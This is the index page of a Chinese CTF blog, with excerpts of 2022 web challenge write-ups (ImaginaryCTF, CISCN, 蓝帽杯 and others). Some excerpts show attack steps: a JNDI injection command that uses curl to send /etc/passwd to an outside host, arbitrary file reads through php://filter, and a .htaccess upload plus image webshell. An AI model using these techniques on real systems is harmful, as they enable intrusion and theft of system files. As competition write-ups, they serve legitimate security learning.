avatar
文章
26
标签
35
分类
8

首页
时间轴
标签
分类
友链
关于
Sk1y's Blog
搜索
首页
时间轴
标签
分类
友链
关于
ImaginaryCTF2022-Web
发表于2022-07-19|比赛wp|2022•ImaginaryCTF
ImaginaryCTF2022[toc] 平台链接:Home Page - ImaginaryCTF button瞎点,出现了 然后搜索alert,发现这个东西 控制台执行 1motSusfunclion() rooCookie关键代码 1234567891011<script>function createToken(text) { let encrypted = ""; for (let i = 0; i < text.length; i++) { encrypted += ((text[i].charCodeAt(0)-43+1337) >> 0).toString(2) } document.cookie = encrypted}document.cookie = "token=101100000111011000000110101110011101100000001010111110010101101111101011110111010111001110101 ...
2022年蓝贝国际创新创业大赛数字技术+信息安全领域赛道网络攻防大赛wp
发表于2022-07-15|比赛wp|Web•2022
2022年蓝贝国际创新创业大赛“数字技术+信息安全领域赛道网络攻防大赛”wpmine 注意观察这个符号,对应的是src.js中的res/face_normal.bmp 进行查找别的face,发现有face_success.bmp 首先进行hex解码 1LJWXQ2C2GN2FKYKXGVXGGMTIGFGUQTJQMIZHQ3CJK42GQYKHKZ2VIQ2GN5MVGRTKJVKEEMSZLBFDS=== 然后进行base32解码 1ZmxhZ3tUaW5nc2h1MHM0b2xlIW4haGVuTCFoYSFjMTB2YXJ9 然后进行base64解码 flag{Tingshu0s4ole!n!henL!ha!c10var} cook查看cookie 然后访问7815696ecbf1c96e6894b779456d330e.php flag{c7a4c2050907de3b70c519287f171f35} upload-inc查看源码,提示include.php 然后访问include.php,查看源码:提示upload.php和参数为file 似 ...
ciscn2022-web-会聊天的机器人
发表于2022-07-14|ciscn2022•web
CISCN2022-华东北-会聊天的机器人可以上传词库规则,然后和机器人对话,就会去进行查找,并且回复 1{ "你好": {"string": "你好ctfer!"}, "1": {"image": "/etc/passwd"}, "2":{"calc":"1+1"} } 这里注意iamge,我们可以传入一个图片的链接,然后机器人会去访问,并且返回,所以我们这里尝试访问/etc/passwd,进行base64解码就可以获取 所以尝试任意文件读取,但是不能读取/flag,可能是路径问题,或者权限问题 继续看calc功能,尝试一下,回显admin才能使用这个功能 还是那个读取文件的东西,使用php伪协议读取api.php 1php://filter/read=convert.base64-encode/resourc ...
蓝帽杯2022_Web_网站取证
发表于2022-07-12|比赛wp|蓝帽杯•2022•fastjson•网站取证
蓝帽杯——Web&网站取证Ez_gadget/json路由下,有个这样的判断 1if (str != null && Objects.hashCode(str) == secret.getKey().hashCode() && !secret.getKey().equals(str)) 这个牵扯到hashcode相同,但是字符串不一样,和md5弱碰撞有点像 找到这个博客:https://blog.csdn.net/weixin_44245828/article/details/109853439 根据博客内容将key:BHUCCIx2zF9mMpJ7进行调整,调整为BHUBbIx2zF9mMpJ7 一个值的ascii差了1,然后紧跟着就整一个ascii大31字母的进行补偿,其余不变 1java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C 'curl http://ip:7010 -Fe=@/etc/passwd' -A "ip" ...
ciscn2022华中赛区web部分wp
发表于2022-07-12|比赛wp|ciscn2022•Web
ciscn2022华中分区web部分wp[toc] FakeUpload1题目描述:嘶,长得好像上传呀。提交 flag 格式:flag{xxxx}。URL:http://该题目IP为Web赛题中【ctf赛题环境】的IP:58002 不是文件上传,是文件读取 当访问pics/1.jpg的时候,url变为了reader.php?filename=pics/1.jpg 所以直接修改报文,读取flag.php Identity23题目端口58003 disearch扫描 传参,找到一个php A0ther_hldden_PaGe.php 访问 A0ther_hldden_PaGe.php 可以上传文件,有一些防护 上传.htaccess文件 1AddType application/x-httpd-php .jpg 然后上传,注意修改报文 传一个图片马1.jpg 然后蚁剑连接 因为1.jpg是之前上传的图片马,现在被当作php解析了 蚁剑连接 查看该文件即可
Hello World
发表于2022-07-11
Welcome to Hexo! This is your very first post. Check documentation for more info. If you get any problems when using Hexo, you can find the answer in troubleshooting or you can ask me on GitHub. Quick StartCreate a new post1$ hexo new "My New Post" More info: Writing Run server1$ hexo server More info: Server Generate static files1$ hexo generate More info: Generating Deploy to remote sites1$ hexo deploy More info: Deployment
123
avatar
Sk1y
每一个不曾起舞的日子都是对生命的辜负
文章
26
标签
35
分类
8
Follow Me
公告
This is my Blog
最新文章
BUUCTF Reverse 11-322023-05-27
CodeQL学习笔记(一)2023-03-06
BUUCTF Reverse 1-102022-11-23
华为杯第一届中国研究生网络安全创新大赛实网对抗赛初赛2022-11-18
第五届强网拟态防御国际精英挑战赛2022-11-07
最新评论
正在加载中...
分类
  • CTF1
  • CodeQL1
  • Java代码审计1
  • Reverse2
  • java安全3
  • nodejs安全2
  • 杂记2
  • 比赛wp12
标签
2022 BDSecCTF BUUCTF CodeQL DASCTF七月赛 ImaginaryCTF JWT QLExpress SHELLCTF Web bytectf cc2 ciscn2022 cmdinject ejs fastjson idea java java-sec-code javassist nodejs nodemon ofcms rce readFileSync web 代码审计 原型链污染 反编译 密钥混淆攻击 强网拟态 祥云杯初赛 网站取证 羊城杯 蓝帽杯
归档
  • 五月 20231
  • 三月 20231
  • 十一月 20226
  • 十月 20228
  • 九月 20221
  • 八月 20222
  • 七月 20227
网站资讯
文章数目 :
26
已运行时间 :
本站总字数 :
34.8k
本站访客数 :
本站总访问量 :
最后更新时间 :
©2022 - 2023 By Sk1y
框架 Hexo|主题 Butterfly
搜索
数据库加载中